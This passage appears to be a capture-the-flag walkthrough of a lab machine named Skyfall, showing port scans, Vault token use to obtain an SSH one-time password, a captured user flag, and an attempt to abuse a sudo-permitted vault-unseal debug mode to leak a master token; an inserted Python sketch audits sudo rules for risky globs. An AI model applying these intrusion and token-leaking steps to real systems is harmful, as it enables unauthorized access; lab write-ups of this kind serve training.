┌──(root㉿Desktop-Trtyr)-[~]
└─# nmap -sT --min-rate 10000 -p- 10.10.11.254
Starting Nmap 7.94SVN ( http://nmap.org ) at 2024-02-07 13:29 CST
Warning: 10.10.11.254 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.11.254
Host is up (0.15s latency).
Not shown: 58911 closed tcp ports (conn-refused), 6622 filtered tcp ports (no-response)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 35.40 seconds

┌──(root㉿Desktop-Trtyr)-[~]
└─# nmap -sTCV -O -p22,80 10.10.11.254
Starting Nmap 7.94SVN ( http://nmap.org ) at 2024-02-07 13:32 CST
Nmap scan report for 10.10.11.254
Host is up (0.15s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 65:70:f7:12:47:07:3a:88:8e:27:e9:cb:44:5d:10:fb (ECDSA)
|_  256 74:48:33:07:b7:88:9d:32:0e:3b:ec:16:aa:b4:c8:fe (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Skyfall - Introducing Sky Storage!
|_http-server-header: nginx/1.18.0 (Ubuntu)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.8 (96%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.5 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 5.0 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.60 seconds
┌──(root㉿Desktop-Trtyr)-[~/Tools]
└─# ./vault login
Token (will be hidden):
WARNING! The VAULT_TOKEN environment variable is set! The value of this variable will take precedence; if this is unwanted please unset VAULT_TOKEN or update its value accordingly.

Success! You are now authenticated. The token information displayed below is already stored in the token helper. You do NOT need to run "vault login" again. Future Vault requests will automatically use this token.

┌──(root㉿Desktop-Trtyr)-[~/Tools]
└─# ./vault token capabilities ssh/roles
list

┌──(root㉿Desktop-Trtyr)-[~/Tools]
└─# ./vault list ssh/roles
Keys
----
admin_otp_key_role
dev_otp_key_role
Now we can try logging in over SSH.
SSH login
┌──(root㉿Desktop-Trtyr)-[~/Tools]
└─# ./vault ssh -role dev_otp_key_role -mode OTP -strict-host-key-checking=no askyy@10.10.11.254
Vault could not locate "sshpass". The OTP code for the session is displayed below. Enter this code in the SSH password prompt. If you install sshpass, Vault can automatically perform this step for you.
OTP for the session is: 140c780c-092d-01cb-5fc5-5fe6af8d9ab4
(askyy@10.10.11.254) Password:

askyy@skyfall:~$ ls
user.txt
askyy@skyfall:~$ cat user.txt
7555ee6e92f71aa2d74b02fc94f44f08
Privilege escalation
Check the available privileges
askyy@skyfall:~$ sudo -l
Matching Defaults entries for askyy on skyfall:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User askyy may run the following commands on skyfall:
    (ALL : ALL) NOPASSWD: /root/vault/vault-unseal -c /etc/vault-unseal.yaml [-vhd]*
    (ALL : ALL) NOPASSWD: /root/vault/vault-unseal -c /etc/vault-unseal.yaml
There are some commands available here.
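The first rule in the `sudo -l` output puts a glob (`[-vhd]*`) in the argument list of a NOPASSWD command. The audit sketch below is an added example, not part of the original write-up: it parses the two rule lines (embedded as constructed sample input) and flags rules whose pattern accepts more than the intended flags. Function names are hypothetical, and Python's `fnmatch` is used as an approximation of sudoers argument matching.

```python
import fnmatch
import re

# Constructed sample input: the two rule lines from the `sudo -l` output above.
SUDO_L = """\
User askyy may run the following commands on skyfall:
    (ALL : ALL) NOPASSWD: /root/vault/vault-unseal -c /etc/vault-unseal.yaml [-vhd]*
    (ALL : ALL) NOPASSWD: /root/vault/vault-unseal -c /etc/vault-unseal.yaml
"""

# "(runas) TAG: TAG: /path/to/cmd [args...]"
RULE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s+(?P<tags>(?:[A-Z_]+:\s*)*)"
                  r"(?P<cmd>/\S+)(?:\s+(?P<args>.*))?$")
GLOB = re.compile(r"[*?\[]")

def parse_rules(text):
    """Hypothetical helper: turn `sudo -l` rule lines into dicts."""
    rules = []
    for line in text.splitlines():
        m = RULE.match(line)
        if m:
            tags = [t.strip() for t in m["tags"].split(":") if t.strip()]
            rules.append({"runas": m["runas"].strip(), "tags": tags,
                          "cmd": m["cmd"], "args": (m["args"] or "").strip()})
    return rules

def accepts(rule, argstr):
    """Approximate sudoers argument matching with fnmatch (an assumption):
    the arguments are matched as one space-joined string, so '*' spans spaces."""
    if not rule["args"]:
        return True  # a rule without arguments allows any arguments
    return fnmatch.fnmatchcase(argstr, rule["args"])

def audit(rule, intended):
    """Flag a rule; `intended` lists the argument strings meant to be allowed."""
    findings = []
    if "NOPASSWD" in rule["tags"]:
        findings.append("NOPASSWD")
    if GLOB.search(rule["args"]):
        findings.append("glob-in-args")
    # Still matching after an arbitrary word is appended = broader than intended.
    if any(accepts(rule, a) and accepts(rule, a + " EXTRA-WORD") for a in intended):
        findings.append("accepts-extra-args")
    return findings

if __name__ == "__main__":
    intended = ["-c /etc/vault-unseal.yaml", "-c /etc/vault-unseal.yaml -v"]
    for r in parse_rules(SUDO_L):
        print(r["args"], "->", audit(r, intended))
```

A tighter rule set lists each permitted flag combination as its own entry instead of using a glob in the argument position.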
askyy@skyfall:~$ /root/vault/vault-unseal -c /etc/vault-unseal.yaml -v
-bash: /root/vault/vault-unseal: Permission denied
askyy@skyfall:~$ sudo /root/vault/vault-unseal -c /etc/vault-unseal.yaml -v
[+] Reading: /etc/vault-unseal.yaml
[-] Security Risk!
[-] Master token found in config: ****************************
[>] Enable 'debug' mode for details
[+] Found Vault node: http://prd23-vault-internal.skyfall.htb
[>] Check interval: 5s
[>] Max checks: 5
[>] Checking seal status
[+] Vault sealed: false
A token was found, but debug mode has to be enabled before it can be used.
Enabling debug mode
Create a debug log file
touch debug.txt
Try running it again
askyy@skyfall:~$ touch debug.txt
askyy@skyfall:~$ sudo /root/vault/vault-unseal -c /etc/vault-unseal.yaml -v
[+] Reading: /etc/vault-unseal.yaml
[-] Security Risk!
[-] Master token found in config: ****************************
[>] Enable 'debug' mode for details
[+] Found Vault node: http://prd23-vault-internal.skyfall.htb
[>] Check interval: 5s
[>] Max checks: 5
[>] Checking seal status
[+] Vault sealed: false
askyy@skyfall:~$ cat debug.txt
askyy@skyfall:~$
It had no effect... maybe a permissions problem?
askyy@skyfall:~$ ls -la
total 32
drwxr-x--- 4 askyy askyy 4096 Feb 11 05:40 .
drwxr-xr-x 3 root  root  4096 Jan 19 21:33 ..
lrwxrwxrwx 1 askyy askyy    9 Nov  9 21:30 .bash_history -> /dev/null
-rw-r--r-- 1 askyy askyy  220 Jan  6  2022 .bash_logout
-rw-r--r-- 1 askyy askyy 3771 Nov  9 21:30 .bashrc
drwx------ 2 askyy askyy 4096 Oct  9 18:47 .cache
-rw-r--r-- 1 askyy askyy  807 Jan  6  2022 .profile
drwx------ 2 askyy askyy 4096 Jan 18 10:32 .ssh
-rw-rw-r-- 1 askyy askyy    0 Feb 11 05:40 debug.txt
-rw-r----- 1 root  askyy   33 Feb 10 18:27 user.txt